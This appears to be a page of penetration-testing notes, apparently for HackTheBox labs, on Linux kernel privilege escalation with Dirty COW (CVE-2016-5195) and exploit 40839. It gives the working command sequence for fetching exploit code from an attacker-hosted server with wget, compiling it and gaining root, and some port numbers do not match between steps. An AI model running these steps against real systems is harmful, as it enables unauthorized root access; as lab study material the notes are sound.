4 Kernel Exploits

FamilyVersions

Dirty Cow

CVE-2016-5195

Effective but Unsafe

Works on old kernels (ie: 2011/2012) Kernel: 3.2.0

Ubuntu 12.04 (2012-2014)

Version

uname -a       ..2011/2012 Kernel should be vuln to Dirty Cow
uname -a       ..debian 2.6.32  - Vulnerable

Linux Versions

Linux-Exploit-Suggester-2

---------------
https://github.com/jondonas/linux-exploit-suggester-2
python -m SimpleHTTPServer 5555
wget http://$IP:4444/linux-exploit-suggester-2.pl

---------------
linux-exploit-suggester-2.pl -k 2.6.32          ..local
./linux-exploit-suggester-2.pl                  ..remote exe

Dirty Cow

  • https://dirtycow.ninja

  • Dirty COW is a privilege escalation vulnerability which exploits a race condition in the way the Linux kernel’s memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings.

  • Download > Scroll to Bottom > Pick most recent Release (ex: Firefart)

  • REF: beepHTB, valentineHTB, lameHTB

dirty.c
https://github.com/FireFart/dirtycow/blob/master/dirty.c
git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git
python -m SimpleHTTPServer 4444
wget http://10.10.14.6:5555/dirty.c

gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty
backs up password to /tmp
newpassword
su firefart  ..root privs!

Dirty c0w - older?

--------------------------------
uname -a                                       ..debian 2.6.32
searchsploit linux kernel 2.6.32 priv esc      ..some
searchsploit linux kernel 2.6 debian priv esc  ..nada
linux-exploit-suggester-2.pl -k 2.6.32         ..'dirty cow'

cat c0w.c                                      ..download/view
gcc -pthread c0w.c -o c0w                      ..complie
./c0w                                          ..exploit
privesc: /usr/bin/passwd                       ..result
whoami                                         ..root
cp /tmp/bak /usr/bin/passwd                    ..cleanup!

40839

uname -a                                     ..linux 2.6.24
searchsploit linux kernel 2.6.24 priv esc    ..search

searchsploit -m 40839.c                      ..copy
python -m SimpleHTTPServer 4444              ..transfer
wget http://$MyIP:4444/40839.c               ..get
gcc -pthread 40839.c -o 40839 -lcrypt        ..compile
./40839  (password)                          ..execute/set pw
su -                                         ..win
Previous3 PrivEscNext5 Looting

Last updated